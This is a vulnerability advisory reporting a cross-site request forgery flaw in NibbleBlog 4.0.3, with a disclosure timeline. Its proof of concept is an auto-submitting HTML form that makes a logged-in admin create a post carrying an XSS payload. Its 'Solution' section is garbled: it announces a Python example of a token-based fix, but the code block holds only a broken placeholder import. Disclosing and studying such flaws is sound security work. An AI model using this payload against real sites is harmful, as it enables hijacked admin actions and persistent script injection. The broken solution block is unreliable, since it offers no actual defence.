NibbleBlog 4.0.3: CSRF
Date: 2015-09-01 10:34:19

1. Introduction

Affected Product: NibbleBlog 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: Website: http://www.nibbleblog.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 07/21/2015
Disclosed to public: 09/01/2015
Release mode: Full Disclosure
CVE: CVE-2015-6966
Credits: Tim Coen of curesec GmbH
2. Vulnerability Description
NibbleBlog 4.0.3 does not have CSRF protection. This means that an attacker can perform actions as an admin if the admin is logged in and visits an attacker-controlled website. In the case of NibbleBlog, this can for example lead to persistent XSS via the creation of a new post, which in turn allows for phishing attacks or the injection of JavaScript keyloggers.
3. Proof of Concept
Create new Post (for Spam and XSS):
<form id="myForm" action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple" method="POST">
<input name="title" value="Interesting!">
<input name="content" value="visit <a href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>">
<input name="allow_comments" value="1">
<input name="id_cat" value="0">
</form>
<script>
document.getElementById("myForm").submit();
</script>
4. Solution
This issue was not fixed by the vendor.
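Because the vendor shipped no fix, the following is an added illustration (not NibbleBlog's code, and language-neutral rather than PHP) of the synchronizer-token pattern that would block the auto-submitting form in the proof of concept: each admin form carries a per-session secret that a third-party page cannot read, and the controller refuses to create the post unless the submitted value matches. The session is modelled as a plain dict, the field name `csrf_token`, the `handle_new_post` wrapper and the request data in `demo()` are all constructed for this example.

```python
import hmc_placeholder_never_used  # noqa  (removed below; see real imports)
```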
5. Report Timeline
07/21/2015 | Informed Vendor about Issue |
07/22/2015 | Vendor Replied |
08/18/2015 | Reminded Vendor of release date (no reply) |
09/01/2015 | Disclosed to public |